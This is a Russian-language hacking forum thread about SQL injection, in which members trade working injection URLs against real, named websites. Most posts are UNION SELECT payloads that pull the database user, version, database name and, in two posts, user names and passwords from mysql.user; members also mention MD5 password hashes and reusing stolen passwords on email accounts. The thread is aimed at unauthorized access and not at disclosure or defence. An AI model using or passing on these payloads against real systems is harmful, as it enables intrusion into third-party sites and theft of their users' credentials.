SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    жесть =)
     
    1 person likes this.
  2. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    _http://www.clean-up.ru/cat.php?cat_id=-1+union+select+user()/*
     
    #722 -=lebed=-, 6 Mar 2007
    Last edited by a moderator: 7 Mar 2007
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    на сайте делать нечего, может пароли подойдут к мылу =)
    ЗЫ Поставил в 13 столбик, т.к оттуда можно копировать. 2 и 3 передаются в тайтл, копировать нельзя, но смотреть удобнее
     
    1 person likes this.
  4. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    _http://justfind.hitv.ru/listing.php?cat=-1
    Интересно вот это можно расковырять?
    _http://rabota.kz/candidates/vacancies.php?cat=1'
    раскрытие пути и только?
     
    #724 -=lebed=-, 6 Mar 2007
    Last edited: 6 Mar 2007
  5. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    нет
    нет - не только! Почитай что ли плз "мануалы" по sql-inj... =\
     
    #725 ice1k, 6 Mar 2007
    Last edited: 6 Mar 2007
  6. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    _http://www.erosfera.ru/browse.php?cat=8'
    Вызов мемберской функции, а мембер всего один:
    _http://www.erosfera.ru/user_search.php?pflag=search :)

    _http://www.erosfera.ru/[email protected] :D
    _http://www.erosfera.ru/search.php?keyword=-111+union+select+1,2,3/*
    P.S. Лан, херню не буду больше постить... сорри.
     
    #726 -=lebed=-, 6 Mar 2007
    Last edited: 6 Mar 2007
  7. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    __
     
    2 people like this.
  8. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    _http://gar-ptisa.ru/show_cat2.php?grid=-1+union+select+user()/*
     
    1 person likes this.
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    пароли в МД5
     
    1 person likes this.
  10. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.sephiroth.it/file_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
     
    1 person likes this.
  11. Nekt

    Nekt Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    58
    Likes Received:
    11
    Reputations:
    0
    http://referat.studentport.su/subtheme.php?id=2'
     
  12. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://referat.studentport.su/subtheme.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
    etc.. ;)
     
    2 people like this.
  13. Nekt

    Nekt Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    58
    Likes Received:
    11
    Reputations:
    0
    Code:
    http://www.artbox.by/menu.php?id=-2+union+select+version(),2,3/*
    в тему про версию.
     
  14. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Code:
    http://www.vvbohemia.com.ua/tours/?t=-1+union+select+user()/*
    Смотреть тайтл

    Code:
    http://events.wayne.edu/view.php?view=-1+union+select+1,user(),3/*
    [email protected]

    Code:
    http://securities.org.ua/securities_paper/review.php?id=322&pub=-1+union+select+1,2,database(),4,5,6,7,8,9/*
     
    4 people like this.
  15. Nekt

    Nekt Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    58
    Likes Received:
    11
    Reputations:
    0
    Я тоже многое перепробывал.
     
  16. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    www.internetsecurity.ru

    Code:
    __http://www.internetsecurity.ru/arts.php?333%27%20/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10/*
    __http://www.internetsecurity.ru/arts.php?333%27%20/**/union/**/select/**/1,version(),database(),4,5,6,7,8,9,user()/*
     
    6 people like this.
  17. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://ul-online.ru/modules/job/vacancy.php?id=-1+union+select+1,user(),version(),4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql.user--
    Первая доведенная до конца)). надеюсь не боян
     
    1 person likes this.
  18. DIAgen

    DIAgen Banned Life!

    Joined:
    2 May 2006
    Messages:
    1,055
    Likes Received:
    376
    Reputations:
    460
    PHP:
    http://ul-online.ru/modules/job/vacancy.php?id=-1+union+select+1,user(),version(),user,password,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from%20+mysql.user--
     
  19. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    PHP:
    http://bloggingheads.tv/video.php?id=-1+union+select+1,2,3,4,5/*
     
  20. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    скуля на udaff.com

    http://cards.udaff.com/viewcat.php?id=3+union+select+1/*
     
Thread Status:
Not open for further replies.